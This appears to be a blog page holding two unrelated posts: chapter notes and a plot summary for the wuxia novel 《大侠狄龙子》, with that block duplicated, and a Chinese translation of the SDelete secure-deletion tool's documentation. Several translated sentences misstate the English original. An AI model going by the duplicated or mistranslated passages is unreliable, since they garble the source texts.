[人]龙腾:山梁子(霸王村)主人。洗手多年的侠盗……虽然出身绿林,专一劫富济贫,也未妄杀一人,归隐之后更作了不少善事……身材高大年约六旬的长髯老者
[人]谢善人:当地财主,平素好武好友,周济贫穷,人虽善良,为喜结纳江湖豪俊,家中也养有不少会武功的能手。……少年英侠……年约三旬,是个白面书生,面容清秀
[人]杨冲:江洋大盗,伤人甚众。为了劫杀行旅,被我(沈冰如)朋友打败,羞恼怀恨,由此洗手,连下数年苦功,练成一身惊人本领和极厉害的暗器,到处寻找我那朋友报仇,均未寻见。龙腾和他相交多年
[人]铁帽真人缪三玄:西川路上一个退隐多年的有名人物……昔年乃西川四凶之一,也为作恶横行,被一高僧打败,由此退隐,出家已三十年,武功极好,从小到老,一直不曾间断,平日戴一铁帽,偶出云游,已不再向人伸手,表面痛改前非,实为那位高僧尚在人间……以前虽然凶横暴戾手狠心黑,伤人甚多,但对常人决不杀害,所劫行旅富家也有分寸,因人而施,从未抢劫善良……自在成都桂湖的左近建了一所道观,在内出家,作为归隐,看去似个三清教下有道之士,本心却是仇恨太深,无计报复,不敢再犯旧恶,自取灭亡,偏又量小性刚,明知此仇难报,仍作万一之想,每日背人苦练,寒暑不断。……内外功均到上乘境界,不是寻常所能抵敌……虽极凶横,但他性情古怪,最是爱才……素来恃强好胜……素来强横,决不藏头缩尾,所戴铁帽和那一身非僧非道的服装一望即知
[人]高僧言出必行,对头天生神力,具有一身惊人本领,炼就罡气,无人能敌……从小出家,俗家只一胞弟,生此一子
[人]沈老先生:百尺竿头洒金钱
[人]姚人英:杨冲新近结纳的北五省绿林中的高手,都是少年气盛,自恃武功
[人]唐方:杨冲新近结纳的北五省绿林中的高手,都是少年气盛,自恃武功……恃强性暴……右手钢镖,左手连珠飞弹,同时右腿一抬,就着钢丸发出之势,朝膝头上一拍,右膝暗藏裤内的梅花飞蝗弩也相继发出。唐方素来手狠心毒,仗着一身武功和这三件暗器,横行北五省已有多年……那飞蝗弩专破气功,打人五官要穴,见血封喉,一任对方多好硬功中上也难活命
[人]李明霞:八仙剑李均之女。……少女穿着一身青罗衫,腰系丝绦,上挂二尺短剑和一镖囊,右肩还斜插着一件奇怪兵刃,看年纪不过十二三岁,生得清秀非常……体态轻盈,丰神明艳,月光之下,望之若仙,……(沈煌)先就觉出对方貌相极美,人又清秀,这一对面,更看出那少女生得明眸皓齿,美艳若仙,年纪也和(沈煌)自己相等……从小便得你干娘怜爱,恨不能把她全身本领一齐传授,于是目中无人
[人]八仙剑李均:昔年关中九侠之一……腰围的白丝绦和那短仅尺许、金光闪闪的八口小剑……是个中等身材、腰围八口小金剑的白面书生……看年纪虽只三四十岁,实则关中九侠自在秦岭合诛猛禽火鹫、巧得灵木芝,同服以后俱享上寿,此时年纪已在九旬以上
旧雨楼·还珠楼主《大侠狄龙子》 全文
大侠狄龙子 2回 概要、endurer评注:双雕助阵 文麟中毒白眉赐丹 二贼行凶 龙子中镖黄肿收下
第 二 回明月照松间 寂寞寒山翔铁羽氛烟生石缝 迷花毒雾起勾蜈
十五夜,文麟、沈煌饭后同往温泉。狄龙子不在,狄大娘已睡。 毒虫勾蜈巢穴在兰谷乳花洞侧山峡缝内。二人在洞外左面孤峰顶上等候。 简冰如借温泉峡隐居的至友和尚多年驯养的两只黑雕引逗挑斗初醒出壳的毒虫,然后将勾蜈的壳取来,投入自炼奇毒无比、粘性更强的灵药。 勾蜈归壳前被冰如和龙子用鸡蛋打击,回壳后被毒药粘住,无法掉头。又被打两毒箭,以毒攻毒,再隔一日夜,全身化为绿水,永绝后患。所喷毒气虽毒,体质最轻,已随风吹散。壳被两雕抱起飞去。 沈煌见雕可爱,掷石击中勾蜈。文麟中毒。得冰如青色丸药。 冰如说文麟最好随到峨眉,病卧三月始能复原,此后任何毒岚恶瘴、流行瘟疫俱都无害。 冰如本想让沈煌暂拜老友门下,等将根基扎好再到峨眉。因沈煌六阴脉象暗藏鬼脉,三年内不将内功练好就没命,只得带去。 龙子被黄肿道人看中收下。 冰如去访那老友。 文麟、沈煌邀龙子吃宵夜。淑华将龙子之母接来同住。 淑华劝文麟谋取功名,成家立业。文麟说自己看空世情,待沈煌成就后南归或就名山小隐。 文麟晚饭时酒醉毒发,呼出淑华乳名“玉姊”。 第二日天近黄昏,龙子传冰如之命,文麟、沈煌上船,冰如人还未到, 沈煌将川江巨盗、巡江夜叉卜天龙、青衣江长松观主、恶道赛纯阳吕凌风误认作冰如,出声将二人引来。 卜天龙在嘉陵江上掳清官遗属二女,为东川三侠所败,来寻吕凌风的师兄、隐居在川东小三峡中温泉峡小庙的铁行脚姚昌,在镇上遇到也被东川三侠打败的吕凌风,商定深夜越墙寻姚昌,不得的话就去秦岭寻一前辈异人出山相助。 吕凌风见沈煌貌相英秀,语声清洪,强要收徒。文麟行缓兵之计。 两只黑雕飞来,抓去卜天龙的刀,横翅一击将卜天龙打落江中。吕凌风的剑被雕抓去见机先逃。 沈煌催雕杀贼。二雕追击,在吕凌风逃入树林之前,在其背上抓了一下。 冰如走到,铁行脚出庙求情。 冰如、文麟、沈煌回船开行。二雕飞走。吕凌风被人拉住由侧面出林入庙。 冰如说文麟得白眉老禅师垂怜,赐丹,余毒已被灵丹化尽,调养两三日就复原了。狄龙子往寻冰如途中打抱不平管,误中毒镖,被冰如送到黄肿道人处。又遇慧圆老尼,受托往离此二百里的萧家场一行。让沈煌先睡,睡醒过来,正好见识。我如与敌人动手,你就看出有多厉害了。” 沈煌终是童心,一听当夜有事,师父还要出手与人对敌,心中高兴,又见天已大明,觉着头一天拜师,不在旁侍立听教,径去安眠于理不合,方说:“弟子不眠,愿陪老师。”冰如答道,“今夜之事甚是难料,你前夜也未睡好,快些睡去,到时也许带你起岸,要走不少山路。补足睡眠,以免疲倦。”沈煌闻言,忽然想起简老师也是一夜未眠,只得应诺,心想:“此时毫无倦意,大自日里岂能入梦?”冰如强令卧倒,也朝身上按了两下,人便睡熟。
endurer说注: 《蜀山剑侠传》中的人物陆续登场现身。许元通、李元化、吴元智合称东川三侠,白眉禅师也赐下灵丹。双雕是否为玉奴、佛奴(后赐英琼,改名钢羽)呢?若是的话,玉奴尚未变白,本书中故事发生的时间还在《蜀山剑侠传》之前。 本书的主角狄龙子居然拜黄肿道人为师…… [禽]两只座山雕/金眼神雕:大雕看去约有半人来高,两翼横张,几达丈许,铁羽凌风,乌光黑亮,一双金碧怪眼,映月生光,形态十分威猛,知道这类座山雕为山中猛禽,爪利如钩,寻常羊鹿吃它一爪便自抓向空中,当时撕裂下肚,未成年的幼童往往被它抱去,连骸骨都无影无踪,端的猛恶无比……乃温泉峡隐居的至友多年驯养,性猛通灵……深通灵性,能辨善恶……爪如坚钢,飞行神速,铁羽凌空,突然下击,休说常人,多好武功的也未必是它对手……鸟腹下两只粗逾人臂、蒲扇般大的乌爪,钢钩也似……近奉师命轻易不许伤人
[虫]勾蜈:约有两尺多长,前半形似一条大蜈蚣,红睛火舌,口有钩钳,腹下两排利爪,通身碧鳞,中杂二三十点红色星光,爪生绿色,闪闪生光,后半蛇身蝎尾,色作暗绿,初窜出时,利爪划动,映月生辉,窑饵乱响,爪上绿毛又有亮光,看去宛如两行碧萤,当中夹着一溜红火……从后半钩尾朝下一搭抵着崖石,身子一拱便翻身朝上蹿去,其疾如箭,动作矫健灵活无比,加上周身火眼碧萤,月光之下美观已极。……毒虫蹿高只得丈许,血口怒张,口边双钳往旁一分,火焰也似的红信往外一伸,喷出一股红烟,正向空中急射……猛伸前爪,抱了毛团一同落下,踞伏在崖缝山石之上,钩尾翘起,反搭背上,用前面四条利爪抱着那只死鸡,利口开处,舞动口边双钳,先是呼呼发威,口喷毒烟,朝鸡身射去,隔不一会,前爪往外一分,刺的一声,鸡身齐中分裂,毒烟随同红信往血口中一卷,也未见怎吞吃,怪口张处喷起大片鸡毛,鸡身皮肉已被毒气化尽。……急得两排利爪连同周身皮鳞一齐颤动,窸窣乱响,宛如一片骤风疾雨之声……三尺多长、前大后细、形似海螺之物……那么猛恶灵警的毒虫,竟被那么小而易碎的鸡蛋打得晕头转向,禁受不住,屡次想要冲起,俱被打退……那海螺是个贝壳……怪虫名叫勾蜈,乃道书上西南十四毒虫之一,性最凶毒,在脱壳以前毒气更重,必须在脱壳之后一周时内除它。此虫最畏卵汁,中上腐烂……也颇通灵机警,感应之力极强,嗅觉最灵……所喷毒气虽毒,体质最轻,已随风吹散……
[医]勾蜈之毒:文麟仍沾了一点,如非冰如灵丹神效,早晚仍难活命,就这样还须病卧三月始能复原,最好择一高山清静之地静养些日,痊愈之后,不特余毒尽去,因仗灵丹之力,从此却病延年,任何毒岚恶瘴、流行瘟疫俱都无害……你那病体虽要静养三月,除开头十来天余毒发作,因受药力克制,周身酸痛,必须静卧,以后和好人差不许多……此时毒已入骨,全仗那丸灵药暂时止痛,不久仍要发作,由第三日起周身酸痛,越往后越厉害。
[医]六阴脉象,中伏鬼脉:六阴脉象本是善征,至多体弱多病而已,似你这样暗藏鬼脉的极难查看。这类脉象虽主短寿,但是人必灵慧,内蕴真力,元气也极坚凝,只要求到名师,得了内家真传,不仅免去短命,并可得享高寿。周老师所说一点不差,只没看出三年之内不将内功练好,二十岁这一关就过不去了。
[人]狄龙子:生长贫家,又是天生异禀,体力健强,最耐劳苦,……偏生此子性太刚烈,美中不足……本是浑金璞玉、不羁之马,我平生谨慎温和,正愁他本质虽好,只恐野性难驯,致犯师规,他又意志坚诚,苦求不舍……言动率真,毫不掩饰^豪爽天真,口快心直,貌相虽丑,但极英武……性喜酒肉,又有兼人之量……一双精光四射的怪眼
[人]姓秦的老农夫:人多地少,仅够度日,人却忠厚善良,当乃母怀孕受屈时曾加照护,主持公道。
[人]芸香:淑华的使女
[人]周文麟:外表温文,内实刚强,天性固执,决劝不转
[人]周文龙:周文麟的兄弟,只得一子,现居南中,久无音讯。
[典]伤心人别有怀抱,实难落于言诠。
[丹]白眉禅师的丹药:丹药色如青莲,清香扑鼻
[人]川江巨盗、巡江夜叉卜天龙:身材高大的壮汉,腰间挂有兵器……精通水性……额横着一条二指宽的刀痕,一脸横肉,貌更丑恶
[人]青衣江长松观主、恶道赛纯阳吕凌风:中年道士,背插单剑,行动极快……一张麻脸,目射凶光,口角时带狞笑……炼就红沙手,所用兵刃暗器均有奇毒,伤人必死,非将内功炼够火候决非其敌。
[武]这娃儿声洪而清,带有刚劲之声,听他急喊老师,十九练过武功
[人]东川三侠:许元通、李元化、吴元智,曾拜异人为师,剑术武功无不惊人,知非敌手
[人]铁行脚姚昌:吕凌风的师兄……独个儿隐居川东小三峡中温泉峡小庙之内……性情古怪,以前虽是绿林中人,颇喜劫富济贫,自归佛门便吃长斋,平生未犯淫过……生得又矮又胖,浓眉大眼,巨鼻掀唇,阔口丰颐,颔下一口络腮短须钢针也似,齐整整根根见肉,穿着一身黄麻布的短僧装,走起路来微闻丁丁之声,好似脚底钉有铁片,相貌神情均极丑怪……以前也是一个独脚大盗,人虽凶横,心性倒也刚直,一向偷富济贫,极少作那伤天害理之事。自从前数年败在我好友李元化的手下,便即洗手归隐,不在人前走动,操行也颇清苦。我因此人十分义气
[人]沈煌:语声清洪……貌相英秀,二目有神……天性嫉恶
[成]临深履薄出自《诗经·小雅·小旻》:“战战兢兢,如临深渊,如履薄冰。”意为面临深渊,脚踩薄冰。比喻小心谨慎,惟恐有失。举例说明:岂可不临深履薄,以为至戒?(《后汉书·杨终传》)
[地]:大沦口,金刚碑-》果园-》北砖
旧雨楼·还珠楼主《大侠狄龙子》 全文
十五夜,文麟、沈煌饭后同往温泉。狄龙子不在,狄大娘已睡。 毒虫勾蜈巢穴在兰谷乳花洞侧山峡缝内。二人在洞外左面孤峰顶上等候。 简冰如借温泉峡隐居的至友和尚多年驯养的两只黑雕引逗挑斗初醒出壳的毒虫,然后将勾蜈的壳取来,投入自炼奇毒无比、粘性更强的灵药。 勾蜈归壳前被冰如和龙子用鸡蛋打击,回壳后被毒药粘住,无法掉头。又被打两毒箭,以毒攻毒,再隔一日夜,全身化为绿水,永绝后患。所喷毒气虽毒,体质最轻,已随风吹散。壳被两雕抱起飞去。 沈煌见雕可爱,掷石击中勾蜈。文麟中毒。得冰如青色丸药。 冰如说文麟最好随到峨眉,病卧三月始能复原,此后任何毒岚恶瘴、流行瘟疫俱都无害。 冰如本想让沈煌暂拜老友门下,等将根基扎好再到峨眉。因沈煌六阴脉象暗藏鬼脉,三年内不将内功练好就没命,只得带去。 龙子被黄肿道人看中收下。 冰如去访那老友。 文麟、沈煌邀龙子吃宵夜。淑华将龙子之母接来同住。 淑华劝文麟谋取功名,成家立业。文麟说自己看空世情,待沈煌成就后南归或就名山小隐。 文麟晚饭时酒醉毒发,呼出淑华乳名“玉姊”。 第二日天近黄昏,龙子传冰如之命,文麟、沈煌上船,冰如人还未到, 沈煌将川江巨盗、巡江夜叉卜天龙、青衣江长松观主、恶道赛纯阳吕凌风误认作冰如,出声将二人引来。 卜天龙在嘉陵江上掳清官遗属二女,为东川三侠所败,来寻吕凌风的师兄、隐居在川东小三峡中温泉峡小庙的铁行脚姚昌,在镇上遇到也被东川三侠打败的吕凌风,商定深夜越墙寻姚昌,不得的话就去秦岭寻一前辈异人出山相助。 吕凌风见沈煌貌相英秀,语声清洪,强要收徒。文麟行缓兵之计。 两只黑雕飞来,抓去卜天龙的刀,横翅一击将卜天龙打落江中。吕凌风的剑被雕抓去见机先逃。 沈煌催雕杀贼。二雕追击,在吕凌风逃入树林之前,在其背上抓了一下。 冰如走到,铁行脚出庙求情。 冰如、文麟、沈煌回船开行。二雕飞走。吕凌风被人拉住由侧面出林入庙。 冰如说文麟得白眉老禅师垂怜,赐丹,余毒已被灵丹化尽,调养两三日就复原了。狄龙子往寻冰如途中打抱不平管,误中毒镖,被冰如送到黄肿道人处。又遇慧圆老尼,受托往离此二百里的萧家场一行。让沈煌先睡,睡醒过来,正好见识。我如与敌人动手,你就看出有多厉害了。” 沈煌终是童心,一听当夜有事,师父还要出手与人对敌,心中高兴,又见天已大明,觉着头一天拜师,不在旁侍立听教,径去安眠于理不合,方说:“弟子不眠,愿陪老师。”冰如答道,“今夜之事甚是难料,你前夜也未睡好,快些睡去,到时也许带你起岸,要走不少山路。补足睡眠,以免疲倦。”沈煌闻言,忽然想起简老师也是一夜未眠,只得应诺,心想:“此时毫无倦意,大自日里岂能入梦?”冰如强令卧倒,也朝身上按了两下,人便睡熟。
endurer说注: 《蜀山剑侠传》中的人物陆续登场现身。许元通、李元化、吴元智合称东川三侠,白眉禅师也赐下灵丹。双雕是否为玉奴、佛奴(后赐英琼,改名钢羽)呢?若是的话,玉奴尚未变白,本书中故事发生的时间还在《蜀山剑侠传》之前。 本书的主角狄龙子居然拜黄肿道人为师…… [禽]两只座山雕/金眼神雕:大雕看去约有半人来高,两翼横张,几达丈许,铁羽凌风,乌光黑亮,一双金碧怪眼,映月生光,形态十分威猛,知道这类座山雕为山中猛禽,爪利如钩,寻常羊鹿吃它一爪便自抓向空中,当时撕裂下肚,未成年的幼童往往被它抱去,连骸骨都无影无踪,端的猛恶无比……乃温泉峡隐居的至友多年驯养,性猛通灵……深通灵性,能辨善恶……爪如坚钢,飞行神速,铁羽凌空,突然下击,休说常人,多好武功的也未必是它对手……鸟腹下两只粗逾人臂、蒲扇般大的乌爪,钢钩也似……近奉师命轻易不许伤人
[虫]勾蜈:约有两尺多长,前半形似一条大蜈蚣,红睛火舌,口有钩钳,腹下两排利爪,通身碧鳞,中杂二三十点红色星光,爪生绿色,闪闪生光,后半蛇身蝎尾,色作暗绿,初窜出时,利爪划动,映月生辉,窑饵乱响,爪上绿毛又有亮光,看去宛如两行碧萤,当中夹着一溜红火……从后半钩尾朝下一搭抵着崖石,身子一拱便翻身朝上蹿去,其疾如箭,动作矫健灵活无比,加上周身火眼碧萤,月光之下美观已极。……毒虫蹿高只得丈许,血口怒张,口边双钳往旁一分,火焰也似的红信往外一伸,喷出一股红烟,正向空中急射……猛伸前爪,抱了毛团一同落下,踞伏在崖缝山石之上,钩尾翘起,反搭背上,用前面四条利爪抱着那只死鸡,利口开处,舞动口边双钳,先是呼呼发威,口喷毒烟,朝鸡身射去,隔不一会,前爪往外一分,刺的一声,鸡身齐中分裂,毒烟随同红信往血口中一卷,也未见怎吞吃,怪口张处喷起大片鸡毛,鸡身皮肉已被毒气化尽。……急得两排利爪连同周身皮鳞一齐颤动,窸窣乱响,宛如一片骤风疾雨之声……三尺多长、前大后细、形似海螺之物……那么猛恶灵警的毒虫,竟被那么小而易碎的鸡蛋打得晕头转向,禁受不住,屡次想要冲起,俱被打退……那海螺是个贝壳……怪虫名叫勾蜈,乃道书上西南十四毒虫之一,性最凶毒,在脱壳以前毒气更重,必须在脱壳之后一周时内除它。此虫最畏卵汁,中上腐烂……也颇通灵机警,感应之力极强,嗅觉最灵……所喷毒气虽毒,体质最轻,已随风吹散……
[医]勾蜈之毒:文麟仍沾了一点,如非冰如灵丹神效,早晚仍难活命,就这样还须病卧三月始能复原,最好择一高山清静之地静养些日,痊愈之后,不特余毒尽去,因仗灵丹之力,从此却病延年,任何毒岚恶瘴、流行瘟疫俱都无害……你那病体虽要静养三月,除开头十来天余毒发作,因受药力克制,周身酸痛,必须静卧,以后和好人差不许多……此时毒已入骨,全仗那丸灵药暂时止痛,不久仍要发作,由第三日起周身酸痛,越往后越厉害。
[医]六阴脉象,中伏鬼脉:六阴脉象本是善征,至多体弱多病而已,似你这样暗藏鬼脉的极难查看。这类脉象虽主短寿,但是人必灵慧,内蕴真力,元气也极坚凝,只要求到名师,得了内家真传,不仅免去短命,并可得享高寿。周老师所说一点不差,只没看出三年之内不将内功练好,二十岁这一关就过不去了。
[人]狄龙子:生长贫家,又是天生异禀,体力健强,最耐劳苦,……偏生此子性太刚烈,美中不足……本是浑金璞玉、不羁之马,我平生谨慎温和,正愁他本质虽好,只恐野性难驯,致犯师规,他又意志坚诚,苦求不舍……言动率真,毫不掩饰^豪爽天真,口快心直,貌相虽丑,但极英武……性喜酒肉,又有兼人之量……一双精光四射的怪眼
[人]姓秦的老农夫:人多地少,仅够度日,人却忠厚善良,当乃母怀孕受屈时曾加照护,主持公道。
[人]芸香:淑华的使女
[人]周文麟:外表温文,内实刚强,天性固执,决劝不转
[人]周文龙:周文麟的兄弟,只得一子,现居南中,久无音讯。
[典]伤心人别有怀抱,实难落于言诠。
[丹]白眉禅师的丹药:丹药色如青莲,清香扑鼻
[人]川江巨盗、巡江夜叉卜天龙:身材高大的壮汉,腰间挂有兵器……精通水性……额横着一条二指宽的刀痕,一脸横肉,貌更丑恶
[人]青衣江长松观主、恶道赛纯阳吕凌风:中年道士,背插单剑,行动极快……一张麻脸,目射凶光,口角时带狞笑……炼就红沙手,所用兵刃暗器均有奇毒,伤人必死,非将内功炼够火候决非其敌。
[武]这娃儿声洪而清,带有刚劲之声,听他急喊老师,十九练过武功
[人]东川三侠:许元通、李元化、吴元智,曾拜异人为师,剑术武功无不惊人,知非敌手
[人]铁行脚姚昌:吕凌风的师兄……独个儿隐居川东小三峡中温泉峡小庙之内……性情古怪,以前虽是绿林中人,颇喜劫富济贫,自归佛门便吃长斋,平生未犯淫过……生得又矮又胖,浓眉大眼,巨鼻掀唇,阔口丰颐,颔下一口络腮短须钢针也似,齐整整根根见肉,穿着一身黄麻布的短僧装,走起路来微闻丁丁之声,好似脚底钉有铁片,相貌神情均极丑怪……以前也是一个独脚大盗,人虽凶横,心性倒也刚直,一向偷富济贫,极少作那伤天害理之事。自从前数年败在我好友李元化的手下,便即洗手归隐,不在人前走动,操行也颇清苦。我因此人十分义气
[人]沈煌:语声清洪……貌相英秀,二目有神……天性嫉恶
[成]临深履薄出自《诗经·小雅·小旻》:“战战兢兢,如临深渊,如履薄冰。”意为面临深渊,脚踩薄冰。比喻小心谨慎,惟恐有失。举例说明:岂可不临深履薄,以为至戒?(《后汉书·杨终传》)
[地]:大沦口,金刚碑-》果园-》北砖
旧雨楼·还珠楼主《大侠狄龙子》 全文
[译]免费的安全删除软件 SDelete v1.51
http://www.microsoft.com/technet/sysinternals/Utilities/SDelete.mspx
SDelete v1.51
By Mark Russinovich
endurer 翻译
Published: November 1, 2006
Introduction
介绍
One feature of Windows NT/2000's (Win2K) C2-compliance is that it implements object reuse protection. This means that when an application allocates file space or virtual memory it is unable to view data that was previously stored in the resources Windows NT/2K allocates for it. Windows NT zero-fills memory and zeroes the sectors on disk where a file is placed before it presents either type of resource to an application. However, object reuse does not dictate that the space that a file occupies before it is deleted be zeroed. This is because Windows NT/2K is designed with the assumption that the operating system controls access to system resources. However, when the operating system is not active it is possible to use raw disk editors and recovery tools to view and recover data that the operating system has deallocated. Even when you encrypt files with Win2K's Encrypting File System (EFS), a file's original unencrypted file data is left on the disk after a new encrypted version of the file is created.
Windows NT/2000's (Win2K)C2-要求的特性之一是实施对象重用保护。这意味着当一个应用程序分配文件空间或虚拟内存时,它不能查看Windows NT/2K为其分配的资源中以前存储的数据。在把两类资源分给一个应用程序前,Windows NT会零填充内存和对存放文件的磁盘扇区置零。然而,对象重用不会指令一个之前未删除的文件占用的空间清零。这是因为Windows NT/2K设计时假定操作系统控制着对系统资源的访问。然而,当操作系统不活动时,使用raw 磁盘编辑程序和恢复工具查看或恢复操作系统已重分配的数据是可能的。甚至当你用 Win2K的加密文件系统(EFS)加密文件时,在新的加密版本的文件被创建后,原始未加密的文件数据被留在磁盘上。
The only way to ensure that deleted files, as well as files that you encrypt with EFS, are safe from recovery is to use a secure delete application. Secure delete applications overwrite a deleted file's on-disk data using techiques that are shown to make disk data unrecoverable, even using recovery technology that can read patterns in magnetic media that reveal weakly deleted files. SDelete (Secure Delete) is such an application. You can use SDelete both to securely delete existing files, as well as to securely erase any file data that exists in the unallocated portions of a disk (including files that you have already deleted or encrypted). SDelete implements the Department of Defense clearing and sanitizing standard DOD 5220.22-M, to give you confidence that once deleted with SDelete, your file data is gone forever. Note that SDelete securely deletes file data, but not file names located in free disk space.
确保被删除文件,以及你用EFS加密的文件免于恢复的安全方法是使用安全删除应用程序。安全删除应用程序覆写被删除文件的磁盘数据,用所示技术来使磁盘数据不可恢复,即使使用可以读取残存被删除文件的磁性媒体的式样的恢复技术。SDelete (Secure Delete) 就是这样的一个应用程序。你既可以使用SDelete来安全地删除现存文件,也可以安全删除存在于磁盘中未分配部分的一些文件数据(包括你已删除或加密的文件)。SDelete实施美国国防部资料摧毁标准DOD 5220.22-M,给予你一旦用SDelete删除,文件数据就永远消失的信心。注意,SDelete安全地删除文件数据,但不含位于自由磁盘空间中的文件名。
SDelete works on Windows 95, 98, NT 4.0 and Win2K.
SDelete运行于Windows 95, 98, NT 4.0 and Win2K。
Top of page
SDelete Usage
SDelete的用法
SDelete is a command line utility that takes a number of options. In any given use, it allows you to delete one or more files and/or directories, or to cleanse the free space on a logical disk. SDelete accepts wild card characters as part of the directory or file specifier.
SDelete是一个带若干选项的命令行工具。按所给用法,你可以删除一个或多个文件和/或目录,或者净化逻辑磁盘上的自由空间。
Usage: sdelete [-p passes] [-s] [-q]sdelete [-p passes] -z [drive letter]
-p passes
Specifies number of overwrite passes
指定覆写趟数。
-s
Recurse subdirectories
处理子目录。
-q
Don't print errors (quiet)
不显示错误
-z
Cleanse free space
净化自由空间
Top of page
How SDelete Works
SDelete如何工作
Securely deleting a file that has no special attributes is relatively straight-forward: the secure delete program simply overwrites the file with the secure delete pattern. What is more tricky is securely deleting Windows NT/2K compressed, encrypted and sparse files, and securely cleansing disk free spaces.
安全删除无特别相对简单易懂的属性的文件:安全删除程序用安全删除典范简单地覆写。巧妙之处在于安全删除Windows NT/2K压缩的、加密的,和稀疏的文件,安全净化磁盘自由空间。
Compressed, encrypted and sparse are managed by NTFS in 16-cluster blocks. If a program writes to an existing portion of such a file NTFS allocates new space on the disk to store the new data and after the new data has been written, deallocates the clusters previously occupied by the file. NTFS takes this conservative approach for reasons related to data integrity, and in the case of compressed and sparse files, in case a new allocation is larger than what exists (the new compressed data is bigger than the old compressed data). Thus, overwriting such a file will not succeed in deleting the file's contents from the disk.
压缩的、加密的,和稀疏(的文件)被NTFS管制于16-簇块中。如果一个程序写这样的文件的现存部分,NTFS分配新磁盘空间来存储新数据,并在新数据写入后,重新分配该文件原来占用的簇。NTFS采取此保守方法的原因关系到数据完整性,例如压缩的和稀疏的文件,假使新分配的大于现存的(新压缩数据大于旧的压缩数据)。因此,在从磁盘中删除文件的内容时,覆写这样的文件将不成功。
《endurer注:1。such a:(+形容词+名词)这样2。for reason:因为...理由3。in the case of:万一(就...来说,至于)4。in case:假使,以防万一;如果,万一》
To handle these types of files SDelete relies on the defragmentation API. Using the defragmentation APISDelete can determine precisely which clusters on a disk are occupied by data belonging to compressed, sparse and encrypted files. Once SDelete knows which clusters contain the file's data, it can open the disk for raw access and overwrite those clusters.
要处理这类文件,SDelete依靠磁盘碎片整理API。利用磁盘碎片整理API,SDelete可以精确地判断磁盘中被属于压缩的、稀疏和加密的文件的数据占用的簇。一旦SDelete知道哪些簇包含这种文件的数据,它可以打开磁盘以raw访问和覆写这些簇。
Cleaning free space presents another challenge. Since FAT and NTFS provide no means for an application to directly address free space, SDelete has one of two options. The first is that it can, like it does for compressed, sparse and encrypted files, open the disk for raw access and overwrite the free space. This approach suffers from a big problem: even if SDelete were coded to be fully capable of calculating the free space portions of NTFS and FAT drives (something that's not trivial), it would run the risk of collision with active file operations taking place on the system. For example, say SDelete determines that a cluster is free, and just at that moment the file system driver (FAT, NTFS) decides to allocate the cluster for a file that another application is modifying. The file system driver writes the new data to the cluster, and then SDelete comes along and overwrites the freshly written data: the file's new data is gone. The problem is even worse if the cluster is allocated for file system metadata since SDelete will corrupt the file system's on-disk structures.
清理自由空间存在另外的挑战。因为 FAT 和 NTFS 没有为应用程序提供直接定位自由空间的意思,SDelete要二选一。第一个是它可以,像针对压缩的、稀疏,和加密的的文件那样,打开磁盘以以raw访问和覆写自由空间。此方法遭遇一个很大的问题:即使SDelete被编码,能够计算NTFS 和 FAT驱动器的自由空间部分(有些不是小事情),它也将冒与系统发生的激活文件操作发生冲突的危险。例如,说SDelete判断一个簇是自由的,就在这时文件系统驱动程序(FAT, NTFS)决定把该簇分配给另一应用程序正在修改的一个文件。文件系统驱动程序写新数据到该簇,然后 SDelete 出现并覆写刚写入的数据:文件的新数据没了。此问题更糟的是,如果该簇被分配给文件系统元数据,从而SDelete将破坏磁盘文件系统结构。
《endurer注:1。suffer from:遭受(因...而蒙受损害)2。capable of:能够3。run the risk of:冒...的危险4。in collision with:与-相撞(在与-冲突中)5。take place:发生6。come along:一道走;出现;来临;快来7。even worse:更糟的是8。metadata:n. [计]元数据》
The second approach, and the one SDelete takes, is to indirectly overwrite free space. First, SDelete allocates the largest file it can. SDelete does this using non-cached file I/O so that the contents of the NT file system cache will not be thrown out and replaced with useless data associated with SDelete's space-hogging file. Because non-cached file I/O must be sector (512-byte) aligned, there might be some left over space that isn't allocated for the SDelete file even when SDelete cannot further grow the file. To grab any remaining space SDelete next allocates the largest cached file it can. For both of these files SDelete performs a secure overwrite, ensuring that all the disk space that was previously free becomes securely cleansed.
第二种方法,也是SDelete采用的,是不直接覆写自由空间。首先,SDelete分配一个最大的文件。SDelete使用非缓存文件I/O来进行,这样NT文件系统缓存的内容将不会被抛出和被与SDelete相关的大空间文件的无用数据替代。因为非缓存文件I/O必须是对齐扇区(512字节),可能存在一些不能为SDelete文件分配的遗留空间,尤其是SDelete不能再扩大文件时。要获取剩余空间,SDelete下一次分配最大缓存文件。针对这些文件,SDelete执行安全覆写,确保所有以前自由的磁盘空间变得安全净化。
《endurer注:1。thrown out: 抛出(说出,撵走,拒绝,显示,发出,派出,打扰,封杀出局)2。left over:留下(剩下,推迟处理)3。even when:即使当》
On NTFS drives SDelete's job isn't necessarily through after it allocates and overwrites the two files. SDelete must also fill any existing free portions of the NTFS MFT (Master File Table) with files that fit within an MFT record. An MFT record is typically 1KB in size, and every file or directory on a disk requires at least one MFT record. Small files are stored entirely within their MFT record, while files that don't fit within a record are allocated clusters outside the MFT. All SDelete has to do to take care of the free MFT space is allocate the largest file it can - when the file occupies all the available space in an MFT Record NTFS will prevent the file from getting larger, since there are no free clusters left on the disk (they are being held by the two files SDelete previously allocated). SDelete then repeats the process. When SDelete can no longer even create a new file, it knows that all the previously free records in the MFT have been completely filled with securely overwritten files.
在NTFS驱动器上,SDelete的工作在分配和覆写两个文件后不一定完了。SDelete还必须用一些可装入MFT记录的文件填充一些现存的NTFS主文件表(MFT)的自由部分。一个MFT记录常规大小是1KB。存储在磁盘上的小文件要求至少一个MFT记录,然后不能装入一个记录的文件被分配在MFT外的簇中。SDelete所要做的是分配最大的文件,注意自由MFT空间-当文件占据了MFT记录中的所有可用空间,NTFS将防止文件变得更大,因为没有自由簇留在磁盘(它们被SDelete先前分配的两个文件占用了)。SDelete接着重复这个过程。当不能再创建新文件时,SDelete就知道MFT中原先所有的自由记录已经被完整用安全覆写文件填充。
To overwrite file names of a file that you delete, SDelete renames the file 26 times, each time replacing each character of the file's name with a successive alphabetic character. For instance, the first rename of "foo.txt" would be to "AAA.AAA".
要覆写你删除的文件的文件名,SDelete将文件改名26次,每次用连续的字母字符替换文件名的每个字符。例如,“foo.txt”的第一次改名将是“AAA.AAA”。
The reason that SDelete does not securely delete file names when cleaning disk free space is that deleting them would require direct manipulation of directory structures. Directory structures can have free space containing deleted file names, but the free directory space is not available for allocation to other files. Hence, SDelete has no way of allocating this free space so that it can securely overwrite it.
SDelete在清理磁盘自由空间时不能安全删除文件名的原因是,删除他们将要求直接处理目录结构。目录结构可能有包含被删文件的自由空间,但自由目录空间不能分配给其它文件。因此,SDelete无法分配此自由空间以安全覆写。
